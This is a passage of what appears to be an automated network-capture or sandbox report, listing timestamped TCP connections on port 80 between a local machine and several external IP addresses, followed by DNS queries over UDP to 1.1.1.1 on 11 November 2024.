                                                                                                                                                                                                          Nov 11, 2024 18:26:04.893115997 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.943217993 CET5797480192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.950153112 CET8057974199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.950685978 CET5797480192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.950685978 CET5797480192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.956715107 CET8057974199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.993554115 CET8057972154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.993726969 CET5797280192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.995773077 CET5797280192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.001008987 CET8057972154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.281321049 CET8057972154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.281399012 CET5797280192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.378601074 CET8057974199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.378618002 CET8057974199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.378667116 CET5797480192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.378707886 CET5797480192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648591042 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648691893 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648703098 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648721933 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648751974 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648802996 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648852110 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648864985 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648880005 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648895025 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648931026 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648931026 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648931026 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649228096 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649271965 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649282932 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649302006 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649341106 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649377108 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.653721094 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.653734922 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.654464960 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.669552088 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.669648886 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.669661999 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.669730902 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737107038 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737121105 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737132072 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737236023 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737251043 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737257957 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737262964 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737308025 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737308025 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737468004 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.737552881 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.738018990 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.738146067 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.738221884 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.738233089 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.738272905 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.738272905 CET5797380192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:26:10.770364046 CET805797364.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:10.770451069 CET5797380192.168.2.864.190.63.136

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.571039915 CET5034453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.571495056 CET6168153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.571770906 CET5770653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.579651117 CET53616811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.582765102 CET53577061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.590806007 CET53503441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.599442959 CET4979353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.602844954 CET5410853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.609909058 CET53497931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.612533092 CET53541081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.629578114 CET6301553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.631107092 CET5572653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.632698059 CET5159053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.634217024 CET6097153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.635745049 CET4979453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.637389898 CET6248653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.639735937 CET6518453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.640341043 CET53515901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.641026974 CET5567153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.641352892 CET53557261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.642386913 CET5395653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.643124104 CET5237153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.643305063 CET53609711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.645742893 CET53497941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.650207996 CET53523711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.651060104 CET53539561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.668104887 CET53624861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.671308994 CET53651841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.828006983 CET53630151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.866209030 CET5421353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.870208025 CET5629453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.878278971 CET5688753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.878598928 CET6506653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.880245924 CET5330753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.881460905 CET4984453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.882561922 CET5200153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.882962942 CET5225953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.883178949 CET5956553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.886693001 CET53568871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.888825893 CET53650661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.889988899 CET53556711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.894975901 CET53595651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.897285938 CET53542131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.900051117 CET53498441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.902669907 CET53562941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.915275097 CET53522591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927580118 CET5481553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927628994 CET6283753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927869081 CET6468053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927998066 CET5268553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928175926 CET5703653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928265095 CET5147753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928392887 CET5394453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928879976 CET5472953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929109097 CET5266853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929553032 CET4990653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929734945 CET6060653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930448055 CET5138653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930636883 CET5153453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930813074 CET5641653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931021929 CET6029453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931186914 CET5215653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931338072 CET5676153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.937978029 CET53514771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.938421965 CET53646801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.938699007 CET53602941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.939672947 CET53526681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.939749002 CET53606061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940445900 CET6203353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940546036 CET53515341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940640926 CET5264053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940813065 CET6045853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940951109 CET5706753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941019058 CET53499061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941464901 CET53513861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941687107 CET53564161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941931009 CET5929953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941996098 CET5978153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.942047119 CET53521561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.942199945 CET5292353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.942291975 CET6346953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943231106 CET4963153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943542004 CET6347353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943717957 CET5577653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943788052 CET5541853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943950891 CET5122353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944082022 CET5231853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944273949 CET5484053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944427013 CET5418053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944586992 CET6193053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944886923 CET5334453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944982052 CET5774453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.945225000 CET6418953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.945400953 CET4965853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.947093010 CET53547291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.949137926 CET53634691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.949289083 CET53597811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.949934006 CET53529231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.950393915 CET53570671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.950491905 CET6456653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.951400995 CET5109853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.952986002 CET53496311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.953887939 CET53548401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.953901052 CET53554181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.953921080 CET53641891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.954087019 CET53557761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.954205036 CET53619301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.955173016 CET53523181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.955692053 CET53496581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.959892035 CET53548151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.960212946 CET53645661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.961218119 CET53510981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.961718082 CET53567611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.962879896 CET53539441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.963488102 CET53634731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.971096039 CET53526401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.971287012 CET53604581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.972223997 CET53620331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.976706028 CET53577441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.983019114 CET53533441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.120646954 CET53520011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.141705036 CET53526851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.145307064 CET53628371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.146900892 CET53541801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.149557114 CET53592991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.150118113 CET53570361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.231169939 CET53512231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.477601051 CET53533071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.027020931 CET5543153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.027131081 CET6244253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.029359102 CET5555053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.031450033 CET6439553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.032654047 CET6184053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.033576965 CET6041953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.034827948 CET5106953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.037971020 CET6503953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.038901091 CET5845253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.039489985 CET53555501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.039794922 CET6068153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.041862965 CET5343553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.042838097 CET5566553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.043385983 CET4922553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.044850111 CET53510691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.049412966 CET53584521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.050945044 CET53492251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.051995039 CET53556651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.058384895 CET53624421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.059433937 CET5370353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.060489893 CET53534351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.062302113 CET5162153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.062694073 CET53643951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.064723015 CET53618401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.065587044 CET53604191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.069349051 CET53650391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.069652081 CET53537031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.071290016 CET53516211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.079761982 CET4958853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.082379103 CET53554311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.091897964 CET53495881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.160078049 CET6086853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.169949055 CET53608681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.170840025 CET6143353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.178246975 CET6094253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.180855036 CET53614331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.183435917 CET5473953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.191323996 CET6200653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.194109917 CET53547391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.195502043 CET6248553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.197626114 CET5037653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.198193073 CET53609421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.202059031 CET5269353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.204164982 CET6221953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.205940008 CET5796553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.206383944 CET53624851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.207467079 CET53503761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.212996006 CET53526931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.216001034 CET53622191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.223401070 CET53620061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.226659060 CET5753753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.227137089 CET6190653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.232743979 CET5145853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.233437061 CET5918353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.233835936 CET6023153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234106064 CET5730653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234325886 CET6057553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234482050 CET5233953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234673977 CET5834853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234822989 CET5408453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234982014 CET6235953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.235129118 CET5734153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.238439083 CET53619061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.245296001 CET53514581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.245595932 CET53540841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.245656967 CET6344353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.246515989 CET53523391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.247515917 CET5410953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.248311043 CET5442753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.248584986 CET5856153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.248934031 CET6436353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.249341011 CET5163553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.249929905 CET6536053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.250335932 CET4990453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.251936913 CET5717753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.252990961 CET5588953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.253645897 CET53591831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.255103111 CET53634431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.255171061 CET5097653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.255377054 CET5191353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.256033897 CET5177653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.258080006 CET53544271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.259135008 CET53516351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.259711981 CET53499041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.259828091 CET5865653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.261086941 CET6330153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.261765957 CET6185853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.262816906 CET5453253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.263310909 CET5900253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.263948917 CET53571771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.265835047 CET4953953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.265876055 CET53623591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.266328096 CET53602311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.266541958 CET53583481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.266582012 CET53605751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.267045975 CET6521453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.267687082 CET5860253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.267851114 CET5581253192.168.2.81.1.1.1
